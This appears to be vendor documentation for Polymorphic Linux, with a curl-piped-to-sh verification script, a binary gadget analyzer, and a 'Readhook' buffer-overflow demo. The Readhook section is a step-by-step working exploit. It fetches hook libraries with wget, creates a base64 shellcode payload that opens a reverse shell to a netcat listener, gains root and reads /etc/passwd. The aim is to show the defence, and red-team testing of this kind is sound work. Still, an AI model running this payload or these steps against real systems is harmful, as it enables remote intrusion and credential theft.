Verification Script

This script lists which repository every installed package was downloaded from. You can use this to verify which packages were replaced by Polymorphic versions.

Note: this script uses the strings utility, which can be found in the binutils package.

curl https://sh.polyverse.com | sh -s list-installed-elf
Back to top

Entropy Analysis

Polyverse provides a completely self-contained binary ROP/JOP gadget analyzer for comparing two binaries side-by-side and understanding their structures. It is written in 100% pure Javascript, and is a self-contained, client-side browser application. It is focused on extreme simplicity of usage and portability across platforms.

  1. Browse to https://analyze.polyverse.com
  2. Retrieve a binary from a system that does not have Polymorphic Linux
  3. Drag and drop the binary into the specified space in the web application (usually on the right)
  4. Observe that the analysis will automatically begin
  5. Retrieve a binary from a system that does have Polymorphic Linux installed
  6. Drag and drop the binary into the specified space in the web application (usually on the left)
  7. Observe that the analysis will automatically begin
  8. Observe that the structure of the stock binary is very different from the polymorphic binary

A video can be found on this analysis tool here.

Back to top

Readhook Buffer Overflow Simulator and Exploit

Readhook is an intentional (and very helpful) buffer-overflow tool, which Red-Teams and individuals can use to get past the difficult and time-consuming business of crafting an exploit. It allows for a full demonstration of the capabilities of Polymorphic Linux, such that a malicious payload, that works across homogeneous systems, will fail when it targets a Polymorphic Linux system.

We can observe Readhook in action by hooking a standard Linux utility (nc) and then have it “phone home” to a listener on port 5555 via a buffer-overflow exploit. We will rely on Docker to host nc (netcat or ncat on some systems) with Readhook, and a host machine will be listening for the call (also using nc, so try to keep them straight as you step through this). The plain text in the blocks are commands that you can cut and paste into your shells. The bold text are examples of what you can expect to see back from the preceding command.

Shell 1: Start a listener for the exploit to call back to. You’ll need the IP address of this listener so you can generate a payload that knows where to call back to. (Since the host is using Docker for Mac, the Docker DNS entry “docker.for.mac.localhost” can be used, which resolves to the host’s Docker IP address.)

nc -l 5555

Shell 2: Open a new shell to start the echo server with readhook. The following commands retrieve the readhook components and runs (a second) nc configured as an “echo server” with readhook active.

docker run --rm --name echo -d -p 8080:8080 alpine:3.7 sh -c 'wget -q -O /tmp/basehook.so https://github.com/plexsolutions/readhook/releases/download/v1.2.2/basehook.so && wget -q -O /tmp/fullhook.so https://github.com/plexsolutions/readhook/releases/download/v1.2.2/fullhook.so && LD_PRELOAD="/tmp/fullhook.so /tmp/basehook.so" nc -l -p 8080 -e /bin/cat'

Shell 2: In the same shell, run (a third) nc to connect to the echo server that you just launched. (It’s running in the background.)

nc localhost 8080
echo-this-back-to-me
echo-this-back-to-me

Shell 2: Also in the same shell, try the same thing with the magic string “xyzzx”, the verb “MAKELOAD”, and the IP address (or DNS name) of the listener (listening in shell 1; in my case, I can use the special Docker DNS name “docker.for.mac.localhost”).

xyzzxMAKELOADdocker.for.mac.localhost

That returns:

xyzzyOVERFLOWAAAAAAAAAAAIAAAAAABCKhAAAAAAAEIqXhoAAAAAUH4AAAAAAABTfmcaAAAAAFB+ABAAAAAAAABwGgAAAABQfgcAAAAAAAAAyFsDAAAATH5YAAAAAABCfmopWJlqAl9qAV4PBUiXSLkCABWzwKhBAlFIieZqEFpqKlgPBWoDXkj/zmohWA8FdfZqO1iZSLsvYmluL3NoAFNIiedSV0iJ5g8FAAAAAAAA

Aha! That’s not an echo, it’s the string that will cause nc to phone home to the listener. Let’s test it out.

Shell 2: Copy the result from above (the red text) and send it back to the echo server. It contains a magic string and a different verb, “OVERFLOW”.

xyzzyOVERFLOWAAAAAAAAAAAIAAAAAABCKhAAAAAAAEIqXhoAAAAAUH4AAAAAAABTfmcaAAAAAFB+ABAAAAAAAABwGgAAAABQfgcAAAAAAAAAyFsDAAAATH5YAAAAAABCfmopWJlqAl9qAV4PBUiXSLkCABWzwKhBAlFIieZqEFpqKlgPBWoDXkj/zmohWA8FdfZqO1iZSLsvYmluL3NoAFNIiedSV0iJ5g8FAAAAAAAA

Hmm… That’s not an echo either. (It turns out the echo server has given way to our exploit: there is now a reverse shell where our echo server used to be.) Let’s go back to our original listener running in Shell 1 to see what we can do.

Shell 1: Go back to the first shell that is listening to port 5555.

whoami
root
cat /etc/passwd
root:x:0:0:root:/root:/bin/ash
bin:x:1:1:bin:/bin:/sbin/nologin
daemon:x:2:2:daemon:/sbin:/sbin/nologin
adm:x:3:4:adm:/var/adm:/sbin/nologin
lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin
sync:x:5:0:sync:/sbin:/bin/sync
shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown
halt:x:7:0:halt:/sbin:/sbin/halt
mail:x:8:12:mail:/var/spool/mail:/sbin/nologin
news:x:9:13:news:/usr/lib/news:/sbin/nologin
uucp:x:10:14:uucp:/var/spool/uucppublic:/sbin/nologin
operator:x:11:0:operator:/root:/bin/sh
man:x:13:15:man:/usr/man:/sbin/nologin
postmaster:x:14:12:postmaster:/var/spool/mail:/sbin/nologin
cron:x:16:16:cron:/var/spool/cron:/sbin/nologin
ftp:x:21:21::/var/lib/ftp:/sbin/nologin
sshd:x:22:22:sshd:/dev/null:/sbin/nologin
at:x:25:25:at:/var/spool/cron/atjobs:/sbin/nologin
squid:x:31:31:Squid:/var/cache/squid:/sbin/nologin
xfs:x:33:33:X Font Server:/etc/X11/fs:/sbin/nologin
games:x:35:35:games:/usr/games:/sbin/nologin
postgres:x:70:70::/var/lib/postgresql:/bin/sh
cyrus:x:85:12::/usr/cyrus:/sbin/nologin
vpopmail:x:89:89::/var/vpopmail:/sbin/nologin
ntp:x:123:123:NTP:/var/empty:/sbin/nologin
smmsp:x:209:209:smmsp:/var/spool/mqueue:/sbin/nologin
guest:x:405:100:guest:/dev/null:/sbin/nologin
nobody:x:65534:65534:nobody:/:/sbin/nologin

That’s it! You can do the same thing with any application that links to libc (which is just about everything).

Additional Information

Back to top

The registered trademark Linux® is used pursuant to a sublicense from the Linux Foundation, the exclusive licensee of Linus Torvalds, owner of the mark on a world­wide basis.